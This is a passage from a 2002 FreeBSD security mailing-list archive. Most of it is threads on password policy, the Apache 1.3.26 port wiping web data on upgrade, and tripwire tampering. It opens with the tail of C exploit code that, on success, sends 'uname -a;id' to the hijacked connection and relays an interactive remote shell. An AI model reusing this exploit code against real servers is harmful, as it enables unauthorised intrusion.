putchar((rand()%2)? 'P': 'p'); fflush(stdout); while (1) { fd_set fds; int n; struct timeval tv; tv.tv_sec =3D EXPLOIT_TIMEOUT; tv.tv_usec =3D 0; FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(sock, &fds); memset(buf, 0, sizeof(buf)); if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) { if(FD_ISSET(sock, &fds)) { if((n =3D read(sock, buf, sizeof(buf) - 1)) <=3D 0) break; if(!owned && n >=3D 4 && memcmp(buf, "\nok\n", 4) =3D=3D 0) { printf("\nGOBBLE GOBBLE!@#%%)*#\n"); printf("retaddr 0x%lx did the trick!\n", retaddr); sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n"); write(sock, expbuf, strlen(expbuf)); owned++; } write(1, buf, n); } if(FD_ISSET(0, &fds)) { if((n =3D read(0, buf, sizeof(buf) - 1)) < 0) exit(1); write(sock, buf, n); } } if(!owned) break; } free(expbuf); close(sock); if(owned) return 0; if(!bruteforce) { fprintf(stderr, "Ooops.. hehehe!\n"); return -1; } } return 0; } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 15:32:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from duckparty.net (mail.duckparty.net [213.145.172.178]) by hub.freebsd.org (Postfix) with ESMTP id 5523637B4A5 for ; Wed, 19 Jun 2002 15:31:58 -0700 (PDT) Received: from Thominem (moya.duckparty.net [213.145.172.179]) by duckparty.net (8.11.6/8.11.2) with SMTP id g5JMVvO02513 for ; Thu, 20 Jun 2002 00:31:57 +0200 Message-ID: <017801c217e1$2fdd06d0$b3ac91d5@Thominem> From: "Thomas Magnussen" To: Subject: unsubscribe Date: Thu, 20 Jun 2002 00:32:25 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0175_01C217F1.F33E2A90" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0175_01C217F1.F33E2A90 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable ------=_NextPart_000_0175_01C217F1.F33E2A90 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
 
------=_NextPart_000_0175_01C217F1.F33E2A90-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 15:33: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from duckparty.net (mail.duckparty.net [213.145.172.178]) by hub.freebsd.org (Postfix) with ESMTP id 13C0337B4DD for ; Wed, 19 Jun 2002 15:32:22 -0700 (PDT) Received: from Thominem (moya.duckparty.net [213.145.172.179]) by duckparty.net (8.11.6/8.11.2) with SMTP id g5JMWLO02519 for ; Thu, 20 Jun 2002 00:32:21 +0200 Message-ID: <018101c217e1$3e4a6aa0$b3ac91d5@Thominem> From: "Thomas Magnussen" To: Subject: unsubscribe Date: Thu, 20 Jun 2002 00:32:49 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_017E_01C217F2.01AD1500" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_017E_01C217F2.01AD1500 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable ------=_NextPart_000_017E_01C217F2.01AD1500 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
 
------=_NextPart_000_017E_01C217F2.01AD1500-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 15:49:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from ren.sasknow.com (ren.sasknow.com [207.195.92.131]) by hub.freebsd.org (Postfix) with ESMTP id DBA1A37B403 for ; Wed, 19 Jun 2002 15:49:11 -0700 (PDT) Received: from localhost (ryan@localhost) by ren.sasknow.com (8.11.6/8.11.6) with ESMTP id g5JMn5837415; Wed, 19 Jun 2002 16:49:05 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Wed, 19 Jun 2002 16:49:04 -0600 (CST) From: Ryan Thompson To: Bill Moran Cc: freebsd-security@FreeBSD.ORG Subject: Re: Password security In-Reply-To: <3D108570.70409@potentialtech.com> Message-ID: <20020619154831.Q32240-100000@ren.sasknow.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Bill Moran wrote to Ryan Thompson: > There were a lot of excellent responses, I'd like to echo the same to the list; thanks to all of you for the plethora of responses and good discussion. This thread is actually not getting as far off track as I thought it might by now :-) > There are some tricks to improve the "average human's" memory. > Poetry is one of them. Most people can memorize a few lines of > poetry (or a song) rather easily. Increase the length of their > passwords to 10+ and then tell them how generate them: Take a line > of poetry or a line from a song and make an acronym from it. Yes, very good idea. I have tried similar strategies in the past, and had problems with compliance. (People inevitably tried it, got tired of the "new thing", and changed their password back to what it was before). I guess the problem was that the users still had access to set almost arbitrary passwords for themselves... so going back to old habits was too easy. I probably should have persisted with this and made it work. Issuing passwords, at least, guarantees some level of password uniqueness and entropy.. provided users don't do foolish things like tape it to their monitor because it's too long to remember. :-) Thus, I can restrict access to the passwd binary, and print the wallet cards with new keys every month, and assist with the memorization of the new short passwords. (Which, if I use the "poetry" idea in some way, will be much easier). > poem is actuall much longer (and I remember the whole flippin > thing), but just those two lines give me "trftpidtshbiclttantb" as a > password, 20 characters, and while I don't know for sure, it would > seem to me that there's more entropy in that than in any "word" Yes, certainly. Calculating the entropy of that beast would be a bit difficult... One could just say 26^20, but if I know (or guess) it's English, and every letter doesn't occur with nearly the same probability, it's less than that. If I happen to know your algorithm, and have a dictionary of poetry and/or lyrics handy, it's a *lot* less than that. If you can mix upper/lower and add punctuation (i.e., "Lo, Fred's chickens laid 24 eggs!" => "L,F'scl2e!", makes for a stronger password). More stats than I'd like to do at the moment. :-) The truth is passwords based on "human" algorithms are usually suprisingly hard to break. Things like q4w3e2r1t0y fool password crackers regularly, and usually require brute-forcing. So, short answer is, yes, your password likely wouldn't be vulnerable to brute-force or standard dictionary attacks. More effort than required to attack other avenues, which is really the important thing. > password. Most people already have dozens of songs memorized, so it > works. This is more of a "stupid human trick" than brave new > technology, but it may be helpful to you. :-) > > The best I've come up with so far is to issue random passwords, > > from an array of 68 possible characters (alpha num and some > > easily-typed symbols). I issue two passwords for each user. One is > > short enough to be remembered with a small effort (6 characters, > > entropy > 2^36, assuming my randomizer is up to par). The second > > [...] > > Actually, that's an excellent procedure. Looks like you've already > done most of your homework. I kind of like it myself. > I'm assuming that you've already looked > into these other issues, but just in case: > Monitor everything. Yep. Log to line printer.. Account audits.. Throughput monitoring (logins, attempts, bandwidth, etc).. Remote monitoring.. The list goes on. > Disable accounts that experience x successive unsuccessful logins Exponential backoff works well enough. I suppose we could trigger stronger (email) warnings to sysadmins and users after a number of unsuccessful attempts. > Obviously, you have some *serious* security concerns. Doesn't everybody? :-) More than anything, password security is weak, yet fairly trivial to strengthen. So I wouldn't be doing my job if I didn't do something about it *before* an attacker takes the initiative :-) > > [...] > > I wouldn't be worried about folks getting mugged, so much as someone > being lazy with the security of their system password hash. In this > case, an account disabling policy will help, because the account > will be disabled before the cracker can brute force it. Many folks > will expose their password to others out of laziness and never > really notice it. Agreed. > [...] > to your network, I would implement a mandatory user education > program. Use it to: > > 1. Explain what's going on and how it works. > > 2. Instruct on best practices. > > 3. Scare the crap out of them. Good points. Of course we already have a security policy (10 clearly written pages, supplemented with links to other sources for those who want a more detailed understanding). I personally present the security policy to new employees and informally discuss the important points one-on-one. A security quiz follows, re-enforced with soda and snacks. Policy seems to sit better when accompanied by food for some reason. :-) > > I know that people *want* to re-use their favorite dictionary > > password(s)... so there will be *some* resistance to a system like > > the above... > > You might be able to use the poetry method above to ease things. Good idea. I might just do that. > > I'm not really interested in a "passwords are bad" debate, unless > > there are readily available technologies of which I'm not aware > > that can be deployed across many dumb insecure computers across an > > insecure network. > > Passwords are fine, users are bad ;) :-) - Ryan -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901 1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 15:55: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from infinity.aesredfish.net (ns1.aesredfish.net [65.168.0.12]) by hub.freebsd.org (Postfix) with ESMTP id 443B537B410 for ; Wed, 19 Jun 2002 15:55:05 -0700 (PDT) Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com [65.168.1.181]) by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id g5JMsjr24592; Wed, 19 Jun 2002 18:54:48 -0400 Message-ID: <3D110D17.50809@potentialtech.com> Date: Wed, 19 Jun 2002 19:00:39 -0400 From: Bill Moran User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020502 X-Accept-Language: en-us, en MIME-Version: 1.0 To: jdarnold@buddydog.org Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port References: <200206191723590704.0033D6FF@mail.speakeasy.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jonathan Arnold wrote: >>I would consider this semi-correct, at least from my experience. The data >>directories ARE seperated out. Notice that there is a data.default and a > > I, in fact, just went through this and would beg to differ. It is not > very kind to delete a complete directory tree without any warning, either > when you install (something like "data.default *WILL BE REPLACED ON > UPGRADE*") or it should check on upgrade and not remove it if it is there. > I lost my entire web site with nary a peep, and luckily had the most important > stuff on another computer. This is outrageous. Have you ever heard of backups? I can't believe you're blaming loss of data on this. As a system administrator you should be backing up your data on a regular schedule. And you should ALWAY back up your data before ANY upgrade. That's just proper procedure. -- Bill Moran Potential Technologies http://www.potentialtech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 16: 4: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from pike.epylon.com (mail03.epylon.com [63.93.9.99]) by hub.freebsd.org (Postfix) with ESMTP id E570C37B417 for ; Wed, 19 Jun 2002 16:03:58 -0700 (PDT) Received: from [192.168.4.154] (sf-gw.epylon.com [63.93.9.98]) by pike.epylon.com (Postfix) with ESMTP id 99B7F59218; Wed, 19 Jun 2002 16:03:58 -0700 (PDT) User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Wed, 19 Jun 2002 16:03:56 -0700 Subject: Re: Apache 1.3.26 port From: Jason DiCioccio To: Bill Moran , Cc: Message-ID: In-Reply-To: <3D110D17.50809@potentialtech.com> Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 6/19/02 4:00 PM, "Bill Moran" wrote: > Jonathan Arnold wrote: >>> I would consider this semi-correct, at least from my experience. The data >>> directories ARE seperated out. Notice that there is a data.default and a >> >> I, in fact, just went through this and would beg to differ. It is not >> very kind to delete a complete directory tree without any warning, either >> when you install (something like "data.default *WILL BE REPLACED ON >> UPGRADE*") or it should check on upgrade and not remove it if it is there. >> I lost my entire web site with nary a peep, and luckily had the most >> important >> stuff on another computer. > > This is outrageous. Have you ever heard of backups? I can't believe you're > blaming loss of data on this. As a system administrator you should be backing > up your data on a regular schedule. And you should ALWAY back up your data > before ANY upgrade. That's just proper procedure. I think there are 2 issues here. One is that he did not do a backup, that is for sure. However, there is an issue with the port as far as I am concerned as well. The port shouldn't be rm -rf'ing anything. It should be going by the plist if anything at all. This way programs like pkg_deinstall pkg_delete can do their jobs correctly. For example, pkg_deinstall will not remove a file if the checksum does not match the checksum that it had upon installation. This would have saved everyone a lot of trouble and is really just the correct way to make a port or a package the last time I checked. Granted pkg_delete, iirc, would have deleted some of the files, like index.html because I don't believe it checks checksums before removing files. However the consequences would have been much less severe. Doesn't this seem reasonable? Cheers, -JD- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 17:56:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from ra.upan.org (ra.upan.org [204.107.76.19]) by hub.freebsd.org (Postfix) with ESMTP id DD20037B40F for ; Wed, 19 Jun 2002 17:56:47 -0700 (PDT) Received: from ocsinternet.com (ool-18bed7b8.dyn.optonline.net [24.190.215.184]) by ra.upan.org (8.12.3/8.11.6) with ESMTP id g5K0ueEZ059840; Wed, 19 Jun 2002 20:56:40 -0400 (EDT) (envelope-from mikel@ocsinternet.com) Message-ID: <3D112847.9050607@ocsinternet.com> Date: Wed, 19 Jun 2002 20:56:39 -0400 From: Mikel King User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:0.9.4) Gecko/20011126 Netscape6/6.2.1 X-Accept-Language: en-us MIME-Version: 1.0 To: Bill Moran Cc: jdarnold@buddydog.org, freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port References: <200206191723590704.0033D6FF@mail.speakeasy.net> <3D110D17.50809@potentialtech.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thank you. I was begining to wonder if anyone else was going to say anything...This is like saying I replaced my hard disk with a new and now my data is gone...Ok I'm sorry people do make mistakes... Two suggestions from my own experience with working with Apache...kick the default conf and driectory tree to the curb. I always use my own web tree structure usually mounted on /web and Imake sure that I have copies of the httpd.conf & php.ini as well...if you ever do a 'make deinstall' you data will be safe because it's not in the /usr/local/www tree infact to be extra safe after you cut a current tape, umount /web... Cheers, mikel Bill Moran wrote: > Jonathan Arnold wrote: > >>> I would consider this semi-correct, at least from my experience. >>> The data >>> directories ARE seperated out. Notice that there is a data.default >>> and a >> >> >> I, in fact, just went through this and would beg to differ. It is not >> very kind to delete a complete directory tree without any warning, >> either >> when you install (something like "data.default *WILL BE REPLACED ON >> UPGRADE*") or it should check on upgrade and not remove it if it is >> there. >> I lost my entire web site with nary a peep, and luckily had the most >> important >> stuff on another computer. > > > This is outrageous. Have you ever heard of backups? I can't believe > you're > blaming loss of data on this. As a system administrator you should be > backing > up your data on a regular schedule. And you should ALWAY back up your > data > before ANY upgrade. That's just proper procedure. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 20:12: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from snickers.hotpop.com (snickers.hotpop.com [204.57.55.49]) by hub.freebsd.org (Postfix) with ESMTP id 3C28837B409 for ; Wed, 19 Jun 2002 20:12:03 -0700 (PDT) Received: from phreaker.net (kubrick.hotpop.com [204.57.55.16]) by snickers.hotpop.com (Postfix) with SMTP id 8660A714A6 for ; Thu, 20 Jun 2002 03:12:00 +0000 (UTC) Received: from zarathustra (213-99-122-57.uc.nombres.ttd.es [213.99.122.57]) by zagnut.hotpop.com (Postfix) with SMTP id C64E0505F9 for ; Thu, 20 Jun 2002 01:49:33 +0000 (UTC) From: "ghebion daskalen duz seguelya" To: Subject: Date: Thu, 20 Jun 2002 03:50:17 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal X-HotPOP: ----------------------------------------------- Sent By HotPOP.com FREE Email Get your FREE POP email at www.HotPOP.com ----------------------------------------------- Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 20:19: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id 1717937B40C for ; Wed, 19 Jun 2002 20:18:59 -0700 (PDT) Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g5K3Hsd09419 for ; Wed, 19 Jun 2002 22:17:54 -0500 (CDT) (envelope-from admin@crimelords.org) Date: Wed, 19 Jun 2002 22:17:54 -0500 (CDT) From: admin To: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port In-Reply-To: <3D112847.9050607@ocsinternet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm totally lost because I just did a cvsup on the ports, went to the port make && make install and I didn't loose anything. I did this on 3 machines and every single one of them is working fine with php, sql and everything as it was before the install. I'm guessing others got it to work as well, maybe there was some custom installs? I've got a few linux box's I was going to upgrade tomorrow....hope they go as well (i'll backup everything to play it safe) -emacs To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 21:55:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 456B637B40F for ; Wed, 19 Jun 2002 21:55:36 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id WAA29310; Wed, 19 Jun 2002 22:54:51 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020619225221.023306b0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 19 Jun 2002 22:54:46 -0600 To: Mikel King , Bill Moran From: Brett Glass Subject: Re: Apache 1.3.26 port Cc: jdarnold@buddydog.org, freebsd-security@FreeBSD.ORG In-Reply-To: <3D112847.9050607@ocsinternet.com> References: <200206191723590704.0033D6FF@mail.speakeasy.net> <3D110D17.50809@potentialtech.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 06:56 PM 6/19/2002, Mikel King wrote: >Two suggestions from my own experience with working with Apache...kick the default conf and driectory tree to the curb. I just tried to build 2.0.39 on a 4.5-p4 system from the Apache tarball, letting it use its default directory (/usr/local/apache2). It wouldn't run; it kept complaining that it couldn't find /usr/local/etc/apache2/mime.types, even though that path was not in Apache's standard tree at all! Not sure what is going on here. Any ideas? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 22: 8:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id B8B7937B41E for ; Wed, 19 Jun 2002 22:08:17 -0700 (PDT) Received: from armageddon (12-24-254-119.man.mn.charter.com [12.24.254.119]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5K53h9g049482; Thu, 20 Jun 2002 01:03:44 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'Ryan Thompson'" , "'Bill Moran'" Cc: Subject: RE: Password security Date: Thu, 20 Jun 2002 00:08:14 -0500 Message-ID: <001b01c21818$7c748d10$77fe180c@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: <20020619154831.Q32240-100000@ren.sasknow.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ryan Thompson wrote to Bill Moran: [...] Yes, certainly. Calculating the entropy of that beast would be a bit difficult... One could just say 26^20, but if I know (or guess) it's English, and every letter doesn't occur with nearly the same probability, it's less than that. If I happen to know your algorithm, and have a dictionary of poetry and/or lyrics handy, it's a *lot* less than that. If you can mix upper/lower and add punctuation (i.e., "Lo, Fred's chickens laid 24 eggs!" => "L,F'scl2e!", makes for a stronger password). More stats than I'd like to do at the moment. :-) [...] What I failed to point out was that, if you're using FreeBSD, which I assume you as you're posting to this group, the FreeBSD login utility still only recognizes 8 character passwords, unless you've changed that. A 20 character password will still do you no good since: ad93fj93ja@#9cjf@jfd is looked at as the exact same password as: ad93fj93e93jf!edkjie Just a thought.... Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 22:17:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from kobold.compt.com (TBextgw.compt.com [209.115.146.18]) by hub.freebsd.org (Postfix) with ESMTP id 768E737B403 for ; Wed, 19 Jun 2002 22:17:10 -0700 (PDT) Date: Thu, 20 Jun 2002 01:17:04 -0400 From: Klaus Steden To: Maxlor Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: preventing tampering with tripwire Message-ID: <20020620011704.G589@cthulu.compt.com> References: <27700541.1024450071@[10.0.0.16]> <2799555.1024487443@[10.0.0.16]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <2799555.1024487443@[10.0.0.16]>; from mail@maxlor.com on Wed, Jun 19, 2002 at 11:50:43AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > Putting the tripwire binary on an external, read only drive doesn't help. > As I mentioned, an attacker who gained root could simply unmount the disk > and place a tampered copy into the mountpoint dir. I would only notice this > if I happened to have a closer look at df *and* the attacker was nice > enough not to modify df too. > True, but that doesn't make it useless - nor was it suggested as a whole solution - only part of a number of steps. It does offer you a set of tools that are guaranteed reliable, though, which is a godsend at times like that. Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 22:26:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 3547C37B406 for ; Wed, 19 Jun 2002 22:25:56 -0700 (PDT) Received: from [80.129.116.189] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.60 #1) id 17KuRa-0003m2-00; Thu, 20 Jun 2002 07:25:18 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 050E1264; Thu, 20 Jun 2002 07:25:17 +0200 (CEST) Received: from jan-linnb.lan (jan-linnb.lan [192.168.0.25]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id CAF20DE; Thu, 20 Jun 2002 07:25:13 +0200 (CEST) Subject: Re: Apache 1.3.26 port From: Jan Lentfer To: jdarnold@buddydog.org Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <200206191723590704.0033D6FF@mail.speakeasy.net> References: <200206191723590704.0033D6FF@mail.speakeasy.net> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 20 Jun 2002 07:24:27 +0200 Message-Id: <1024550667.2170.11.camel@jan-linnb.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Mit, 2002-06-19 um 23.23 schrieb Jonathan Arnold: > >I would consider this semi-correct, at least from my experience. The data > >directories ARE seperated out. Notice that there is a data.default and a > > I, in fact, just went through this and would beg to differ. It is not > very kind to delete a complete directory tree without any warning, either > when you install (something like "data.default *WILL BE REPLACED ON > UPGRADE*") or it should check on upgrade and not remove it if it is there. > I lost my entire web site with nary a peep, and luckily had the most important > stuff on another computer. > > Nothing, anywhere, says anything about data.default getting overwritten / > replaced on upgrade. I agree. I am pretty much a newbie to FreeBSD and I must admit it didn't even know about the data / data.default symlink thing with apache for the first few weeks, because I just always typed "cd /usr/local/www/data" and really newer ls'd the www directory (OK, shoot me :-) ). Yes, people who say "back up your data" are absolutley right. But still I think the port should have 2 things: 1) A notice on the symlink structure of "data.default" and "data" on first installation (if it is there I just didn't read it, which is NOT impossible ;-) ) 2) A warning about overwriting the default directories - like "type 'yes' to proceed". I guess that's not too much work and it would prevent people without backups to lose their data ;-). Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 23:13:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from relay.sambolian.net.nz (203-79-83-205.cable.paradise.net.nz [203.79.83.205]) by hub.freebsd.org (Postfix) with ESMTP id AE1EA37B404 for ; Wed, 19 Jun 2002 23:13:28 -0700 (PDT) Received: from smtp.sambolian.net.nz (grace.sambolian.net.nz [192.168.0.11]) by relay.sambolian.net.nz (Postfix) with ESMTP id 44C4757316 for ; Thu, 20 Jun 2002 18:13:27 +1200 (NZST) Received: by smtp.sambolian.net.nz (Postfix, from userid 80) id A0C9411217; Thu, 20 Jun 2002 18:16:44 +1200 (NZST) Received: from 192.168.0.30 ( [192.168.0.30]) as user andy@imap.sambolian.net.nz by webmail.sambolian.net.nz with HTTP; Thu, 20 Jun 2002 18:16:44 +1200 Message-ID: <1024553804.3d11734c7c04a@webmail.sambolian.net.nz> Date: Thu, 20 Jun 2002 18:16:44 +1200 From: Andrew Thompson To: admin@crimelords.org Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 192.168.0.30 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It depends if you have the files in /usr/local/www/data.default or /usr/local/www/data, on an install data is symlinked to data.default and its the data.default that gets clobbered. -Andrew Quoting admin : > > I'm totally lost because I just did a cvsup on the ports, went to the port > make && make install and I didn't loose anything. I did this on 3 > machines and every single one of them is working fine with php, sql and > everything as it was before the install. I'm guessing others got it to > work as well, maybe there was some custom installs? I've got a few linux > box's I was going to upgrade tomorrow....hope they go as well (i'll backup > everything to play it safe) > > -emacs > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 23:26: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mta1-rme.xtra.co.nz (mta1-rme.xtra.co.nz [210.86.15.129]) by hub.freebsd.org (Postfix) with ESMTP id D5A4837B401 for ; Wed, 19 Jun 2002 23:25:23 -0700 (PDT) Received: from netxsecure.net ([210.86.38.134]) by mta1-rme.xtra.co.nz with ESMTP id <20020620062521.GNEC12898.mta1-rme.xtra.co.nz@netxsecure.net>; Thu, 20 Jun 2002 18:25:21 +1200 Message-ID: <3D1176AB.F3DA489C@netxsecure.net> Date: Thu, 20 Jun 2002 18:31:07 +1200 From: "Michael A. Williams" Reply-To: mike@netxsecure.net X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.4-RELEASE i386) 